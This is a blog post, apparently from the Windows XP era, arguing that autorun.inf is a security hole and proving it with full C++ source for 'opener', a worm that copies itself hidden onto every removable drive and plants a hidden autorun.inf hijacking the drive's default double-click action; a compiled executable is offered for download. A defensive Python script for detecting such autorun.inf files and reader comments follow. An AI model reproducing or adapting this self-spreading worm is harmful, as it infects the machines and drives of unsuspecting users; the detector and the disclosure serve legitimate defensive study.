Opener: A USB Flash Drive Virus

For a really long time, people have been telling Microsoft that autorun.inf is not only a stupid idea, but also a security risk. Pretty much whenever a computer does something the user didn't specifically ask it to do, it's a potential security risk... and you can always rely on Microsoft to make the potential an actual.

Of course, talk is cheap. If autorun.inf is such a big security hole, it really shouldn't be hard to prove, should it? Fair enough, here's some code:


// opener.cpp - build as a Unicode Win32 (GUI subsystem) application.
#define UNICODE
#define _UNICODE
#include <windows.h>
#include <tchar.h>
#include <stdlib.h>
#include <string.h>

// The autorun.inf that gets dropped: it defines a verb "Eject" whose command
// is opener.exe, then makes that verb the default (double-click) action.
#define AUTORUN_CONTENTS "[autorun]\r\nshell\\eject=Eject\r\nshell\\eject\\command=opener.exe\r\nshell=eject\r\n"

HANDLE hmutex = NULL;

// Release the single-instance mutex when the process exits.
void closing()
{
	if (hmutex)
		ReleaseMutex(hmutex);
}

int APIENTRY _tWinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPTSTR    lpCmdLine,
                     int       nCmdShow)
{
	UNREFERENCED_PARAMETER(hInstance);
	UNREFERENCED_PARAMETER(hPrevInstance);
	UNREFERENCED_PARAMETER(lpCmdLine);
	UNREFERENCED_PARAMETER(nCmdShow);

	// Step 1: open an Explorer window for the drive this copy is running from,
	// so the user sees what they expected when they double-clicked the drive.
	WCHAR myfile[1024];
	GetModuleFileName(NULL, myfile, 1024);
	if (myfile[1] != L':')
		return 1;
	WCHAR cmd[1024];
	wsprintf(cmd, L"explorer %c:\\", myfile[0]);
	STARTUPINFOW si;
	memset(&si, 0, sizeof(si));
	si.cb = sizeof(si);
	PROCESS_INFORMATION po;
	memset(&po, 0, sizeof(po));
	if (CreateProcess(NULL, cmd, NULL, NULL, FALSE, 0, NULL, NULL, &si, &po)) {
		CloseHandle(po.hThread);
		CloseHandle(po.hProcess);
	}

	// Step 2: a named mutex makes sure only one copy is running.
	// CreateMutex returns NULL (not INVALID_HANDLE_VALUE) on failure.
	hmutex = CreateMutex(NULL, TRUE, L"Opener");
	if (hmutex == NULL)
		return 1;
	if (GetLastError() == ERROR_ALREADY_EXISTS) {
		CloseHandle(hmutex);
		hmutex = NULL;
		return 1;
	}

	atexit(closing);

	// Read our own image into memory so it can be written to each drive later.
	// CreateFile returns INVALID_HANDLE_VALUE (not NULL) on failure.
	HANDLE hmyfile = CreateFile(myfile, GENERIC_READ, 0, NULL, OPEN_EXISTING, 0, NULL);
	if (hmyfile == INVALID_HANDLE_VALUE)
		return 1;
	DWORD szhigh = 0;
	DWORD szlow = GetFileSize(hmyfile, &szhigh);
	if (szhigh != 0) {	// give up on anything 4 GB or larger
		CloseHandle(hmyfile);
		return 1;
	}
	void *myfilemem = malloc(szlow);	// szhigh is zero here, so szlow is the whole size
	if (myfilemem == NULL) {
		CloseHandle(hmyfile);
		return 1;
	}
	DWORD nread;
	ReadFile(hmyfile, myfilemem, szlow, &nread, NULL);
	CloseHandle(hmyfile);

	// Steps 3 to 11: scan the drives forever, infecting each removable one once.
	while (1) {
		DWORD mask = GetLogicalDrives();
		for (int i = 0; i < 26; i++)
			if (mask & (1 << i)) {
				WCHAR path[100];
				path[0] = L'A' + i;
				path[1] = L':';
				path[2] = L'\\';
				path[3] = 0;
				DWORD type = GetDriveType(path);
				if (type == DRIVE_REMOVABLE) {
					DWORD spc, bps, nfc, tnc;
					if (GetDiskFreeSpace(path, &spc, &bps, &nfc, &tnc)) {
						// Note: "free clusters < total clusters" means the drive is not
						// completely empty; it does not check that space is available.
						if (nfc < tnc) {
							wsprintf(path, L"%c:\\autorun.inf", L'A' + i);
							// Step 5: leave drives that already have an autorun.inf alone.
							if (GetFileAttributes(path) == INVALID_FILE_ATTRIBUTES) {
								// Steps 6 and 8: create autorun.inf with the hidden attribute set.
								HANDLE h = CreateFile(path, GENERIC_WRITE, 0, NULL, CREATE_NEW, FILE_ATTRIBUTE_HIDDEN, NULL);
								if (h != INVALID_HANDLE_VALUE) {
									DWORD written;
									WriteFile(h, AUTORUN_CONTENTS, (DWORD)strlen(AUTORUN_CONTENTS), &written, NULL);
									CloseHandle(h);
									// Steps 7 and 8: write a hidden copy of ourselves next to it.
									wsprintf(path, L"%c:\\opener.exe", L'A' + i);
									h = CreateFile(path, GENERIC_WRITE, 0, NULL, CREATE_NEW, FILE_ATTRIBUTE_HIDDEN, NULL);
									if (h != INVALID_HANDLE_VALUE) {
										WriteFile(h, myfilemem, szlow, &written, NULL);
										CloseHandle(h);
									} else {
										// Couldn't write the executable, so remove the autorun.inf
										// rather than leave a dangling entry on the drive.
										wsprintf(path, L"%c:\\autorun.inf", L'A' + i);
										DeleteFile(path);
									}
								}
							}
						}
					}
				}
			}
		// Step 10: wait about a minute, then go round again.
		Sleep(1000 * 60);
	}

	return 0;
}

Download: opener.cpp, and here it is compiled: opener.exe.

How does it work?

It's really quite simple:

  1. Open an explorer window for the drive we're running from.
  2. Make sure there is only one copy of opener.exe running.
  3. Scan the available drives for any that are removable.
  4. Check that there is some free space on the drive.
  5. Check that the drive doesn't already have an autorun.inf.
  6. Dump the following into autorun.inf:
    [autorun]
    shell\eject=Eject
    shell\eject\command=opener.exe
    shell=eject
    
    This creates a new shell verb, which I've just arbitrarily named "Eject", and, importantly, makes it the default action.
  7. Write a copy of opener.exe to the drive.
  8. Mark both autorun.inf and opener.exe as hidden.
  9. Do any other removable drives we can find.
  10. Wait about a minute.
  11. Go back to step 3.

So once opener is running, go ahead and insert a flash drive and wait a little. If you have "show hidden files" turned on in the Folder Options (the default is off, thanks again Microsoft) you will be able to see when the drive has been infected. Remove the drive, use Task Manager to kill opener.exe, and now plug the drive back in. If you're used to having Windows pop up the "I've found a new drive, what should I do?" box, then you'll immediately notice the change: it won't pop up now. You may have had this experience before... it's kinda random when Windows will and won't pop up that box.

No matter, go to My Computer as you typically would and double-click on the drive that has been found, as you would normally do to open it. If you're like me and turn off the "give me a new window every time I sneeze" behaviour in the Folder Options, then you will now notice another slight change in behaviour, in that you will get a new window for the drive. If you check Task Manager now you will see that opener.exe is running again.

And so the cycle continues.
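From the defender's side, the thing to look for is exactly what steps 5 to 8 and the plug-it-back-in test above describe: an autorun.inf in the root of a removable volume that defines its own shell verb, points that verb's command at an executable on the same volume, and makes it the default action. The following is an added example, not code from the original post; it parses an autorun.inf, classifies what it would do, and checks whether the referenced program is actually present next to it. The function names (parse_autorun, analyze_autorun, scan_volume_root) and the sample .inf contents are mine, constructed for the example; enumerating drives and checking the hidden attribute are left to the caller. Later versions of Windows stopped honouring autorun.inf on non-optical removable media, but the file is still worth flagging when it turns up on a USB stick.

```python
"""Flag autorun.inf files that redirect Explorer's default action to a program.

Added example (not part of the original post). Sample inputs are constructed.
"""
import os
import re
import sys
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample: the same four lines the proof-of-concept above writes.
SAMPLE_WORM_INF = "[autorun]\r\nshell\\eject=Eject\r\nshell\\eject\\command=opener.exe\r\nshell=eject\r\n"
# Constructed sample: a typical harmless autorun.inf that only sets an icon and a label.
SAMPLE_BENIGN_INF = "[autorun]\r\nicon=drive.ico\r\nlabel=Backup Drive\r\n"


@dataclass
class AutorunFinding:
    default_verb: Optional[str]          # value of "shell=", lowercased, if any
    commands: Dict[str, str]             # verb -> command line from shell\<verb>\command=
    launch_targets: List[str]            # programs the file would start
    missing_targets: List[str] = field(default_factory=list)
    verdict: str = "benign"              # benign | launches-code | hijacks-default-action


def parse_autorun(text: str) -> Dict[str, str]:
    """Return the [autorun] section as lowercase key -> value.

    autorun.inf is INI-like, but keys contain backslashes and values may
    contain '=', so a small hand-rolled parser is used rather than configparser.
    """
    entries: Dict[str, str] = {}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "autorun" or "=" not in line:
            continue
        key, _, value = line.partition("=")
        entries[key.strip().lower()] = value.strip()
    return entries


def _program_of(command_line: str) -> str:
    """Return the program part of a command line ('"a b.exe" /x' -> 'a b.exe')."""
    cmd = command_line.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end] if end > 0 else cmd[1:]
    return cmd.split()[0] if cmd else ""


def analyze_autorun(text: str, root: Optional[str] = None) -> AutorunFinding:
    """Classify an autorun.inf; if root is given, check the targets exist there."""
    entries = parse_autorun(text)
    default_verb = entries.get("shell")
    default_verb = default_verb.lower() if default_verb else None
    commands: Dict[str, str] = {}
    for key, value in entries.items():
        m = re.fullmatch(r"shell\\([^\\]+)\\command", key)
        if m:
            commands[m.group(1)] = value  # key is already lowercased
    # open= and shellexecute= start a program directly; verb commands start one on click.
    targets = [entries[k] for k in ("open", "shellexecute") if k in entries]
    targets += list(commands.values())
    programs = [p for p in (_program_of(t) for t in targets) if p]
    missing: List[str] = []
    if root is not None:
        missing = [p for p in programs if not os.path.exists(os.path.join(root, p))]
    if default_verb and default_verb in commands:
        verdict = "hijacks-default-action"   # the pattern the proof-of-concept uses
    elif programs:
        verdict = "launches-code"
    else:
        verdict = "benign"
    return AutorunFinding(default_verb, commands, programs, missing, verdict)


def scan_volume_root(root: str) -> Optional[AutorunFinding]:
    """Read <root>/autorun.inf if present and analyze it; None when there is none."""
    inf = os.path.join(root, "autorun.inf")
    if not os.path.isfile(inf):
        return None
    with open(inf, "r", encoding="utf-8", errors="replace") as fh:
        return analyze_autorun(fh.read(), root)


if __name__ == "__main__":
    # Usage: python autorun_check.py E:\ F:\   (each argument is a mounted volume root)
    for volume in sys.argv[1:]:
        finding = scan_volume_root(volume)
        print(volume, "no autorun.inf" if finding is None else finding)
```

The verdict "hijacks-default-action" is reserved for the case where the default verb is one the file itself defines, because that is what makes a double-click on the drive run the dropped program; a plain open= line is reported separately as "launches-code". A missing target (opener.exe already removed but autorun.inf left behind) is reported rather than treated as clean, since the inf alone still shows the drive was touched.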

Dear Microsoft, please fix, thanks.


QuantumG


Locke says:
Yet another glaring hole in Microsoft's logic which will most definitely be answered by a statement that the user should only ever be using Microsoft approved hardware and software that has never been touched since they approved it and shrink-wrapped it. So, if you aren't using their stuff and you get a virus, your warranty is void, and no soup for you.
Locke says:
I've posted about this on my blog and linked and credited you. Let me know what you think of my site if you get a chance. Thanks, Locke
Linux says:
Linux
Linux says:
Disregard that, I suck cocks.
Linus says:
I'm not sure who thinks he's funnier linux or the guy posting as linux...
Impotence says:
This would spread through a college or university like wildfire; half of the people I know at college have a flash drive with them at all times and are copying things onto other people's flash drives for them (study notes etc.).
MatthewT says:
Amazing concept, more people need to know of this.
This guy thinks you should just disable autorun, but a link is all he says:
http://features.engadget.com/2004/06/29/how-to-tuesday-disable-autorun-on-windows/
Patrick says:
http://wiki.hak5.org/wiki//USB_Hacksaw
Bill says:
Autorun should be disabled by default, like hiding filename suffixes.
Leo. says:
Stop criticizing Windows. For the people who don't care about/understand this, Windows will remain the best option. For those who understand this... well, we already know that Windows is shit.
Par[A]doX says:
Oh my god! This is the worst thing that can ever happen in the history of things happening!
Never mind the fact that this, Hacksaw, and USBDumper are all easily detected by most antivirus software on the market as being malicious and therefore incapable of being downloaded, let alone executed.
WhatIsQDOS? says:
Never mind that anyone who understands the code above can alter and recompile it, voiding antivirus signature detection.

Never mind that any single point of failure in 3rd party "bulletproof vest" security products gives the attacker full ownership of a target machine running any Microsoft operating system.

Never mind that millions of botnet zombie computers, all of them with Microsoft operating systems, are dutifully downloading their antivirus updates every day, in between spraying spam across the world and participating in DDOS attacks.
Imposter says:
Oh, windows. When will you learn?
Embryonic says:
Ubuntu =P
Luke says:
Ubuntu rocks, I agree with Embryonic :D
paperbeatsrock says:
www.fatchicksinpartyhats.com would destroy that virus... and all of mankind!